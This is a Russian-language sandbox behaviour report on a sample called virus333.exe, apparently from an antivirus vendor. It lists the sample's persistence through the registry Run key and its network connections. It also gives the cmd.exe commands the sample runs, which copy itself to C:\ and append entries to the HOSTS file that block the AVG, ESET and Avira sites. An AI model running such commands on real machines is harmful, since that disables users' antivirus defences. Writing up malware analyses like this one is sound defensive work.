Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [HKLM\Software\Microsoft\Windows\CurrentVersion\run] 'virus' = 'C:\virus333.exe'
Изменения в файловой системе
Создает следующие файлы
- C:\333.txt
Изменяет файл HOSTS.
Сетевая активность
Подключается к
- '34.##9.100.209':443
TCP
Другие
- '34.##9.100.209':443
UDP
- DNS ASK google.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c copy virus333.exe c:\virus333.exe
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\ping.exe -n 1 google.com >> C:\333.txt
- '<SYSTEM32>\ping.exe' -n 1 google.com
- '<SYSTEM32>\cmd.exe' /c echo 12#.3.3.3 avg.com >> <DRIVERS>\etc\hosts
- '<SYSTEM32>\cmd.exe' /c echo 12#.3.3.3 www.avg.com >> <DRIVERS>\etc\hosts
- '<SYSTEM32>\cmd.exe' /c echo 12#.3.3.3 eset.com >> <DRIVERS>\etc\hosts
- '<SYSTEM32>\cmd.exe' /c echo 12#.3.3.3 www.eset.com >> <DRIVERS>\etc\hosts
- '<SYSTEM32>\cmd.exe' /c echo 12#.3.3.3 avira.com >> <DRIVERS>\etc\hosts
- '<SYSTEM32>\cmd.exe' /c echo 12#.3.3.3 www.avira.com >> <DRIVERS>\etc\hosts
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\msg.exe * PRESIONE F3 PARA DETENER ESTE VIRUS DE APRENDIZAJE
- '<SYSTEM32>\msg.exe' * PRESIONE F3 PARA DETENER ESTE VIRUS DE APRENDIZAJE
